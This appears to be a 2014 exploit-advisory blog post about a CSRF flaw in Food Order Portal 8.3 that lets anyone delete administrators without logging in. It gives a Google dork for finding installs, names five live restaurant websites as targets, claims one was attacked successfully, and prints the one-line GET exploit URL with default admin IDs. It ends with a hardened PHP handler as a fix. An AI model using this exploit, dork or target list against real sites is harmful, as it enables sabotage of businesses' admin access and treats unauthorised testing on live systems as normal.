Thursday, 11 September 2014
Food Order Portal 8.3 - (CSRF) Remote Admin Delete PoC
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact (mail only) : knockout@e-mail.com.tr
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com
############################################################
Turkey Security Group
'h4x0re SECURITY'
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Food Order Portal
|~Affected Version : 8.3
|~Official Web and references : http://www.tourismscripts.com/scripts/scripts/food-order-portal-multi-restaurant-lingual-php-script.html
|~RISK : Medium
|~Google Keyword/Dork : inurl:login_restaurant.php | example
|~Tested On : Kali Linux \ Tested Browser: Mozilla Firefox \ Arora
####################INFO################################
Without logging in to the admin panel it is possible to delete an administrator.
########################################################
########################################################
Demos:
http://click4foods.co.uk <=== Tested and panel was checked. CSRF was confirmed
(Shown as references on the official site)
http://www.saveonmeals.com
http://pizzatakeway.it/
http://myfood24.it/
http://www.foodrunner.ru/
..
..
=============================================================
CSRF PoC:
http://[VICTIM]/admin/admin_user_delete.php?admin_id=[ADMIN ID] (Default: 1,2)
Administrator Deleted.
=============================================================
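The PoC above works because a single unauthenticated GET request is enough to delete an administrator. The hardened handler below is an added example, not code from Food Order Portal: it is an assumed replacement for an endpoint like admin_user_delete.php that requires a logged-in admin session, accepts only POST, and verifies a per-session CSRF token before touching the database. Session key names, the `$pdo` connection and the `admins` table are assumptions.

```php
<?php
// Added hardened example (not the product's own code) for an admin-delete
// endpoint such as admin_user_delete.php.
// Assumptions: $_SESSION['admin_id'] is set at admin login, $pdo is an
// existing PDO connection, and the table/column names are placeholders.
declare(strict_types=1);
session_start();

function csrf_token(): string
{
    // One token per session, produced by a CSPRNG; embed it in every
    // state-changing form as <input type="hidden" name="csrf_token" ...>.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function require_admin(): void
{
    // Closes the "without logging in" hole: no session, no delete.
    if (empty($_SESSION['admin_id'])) {
        http_response_code(403);
        exit('Login required');
    }
}

function delete_admin(PDO $pdo): void
{
    require_admin();
    // A destructive action must not be reachable by a plain link (GET).
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit('POST required');
    }
    // Constant-time comparison of the submitted token with the session one.
    $sent = $_POST['csrf_token'] ?? '';
    if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    $id = filter_input(INPUT_POST, 'admin_id', FILTER_VALIDATE_INT);
    if ($id === false || $id === null || $id === (int) $_SESSION['admin_id']) {
        http_response_code(400);
        exit('Invalid admin_id');
    }
    $stmt = $pdo->prepare('DELETE FROM admins WHERE admin_id = :id');
    $stmt->execute([':id' => $id]);
    echo 'Administrator deleted.';
}
```

Setting the session cookie with `SameSite=Lax` or `Strict` adds a second layer, since the browser then withholds the cookie on cross-site POSTs, but the token check is what makes the endpoint safe on its own.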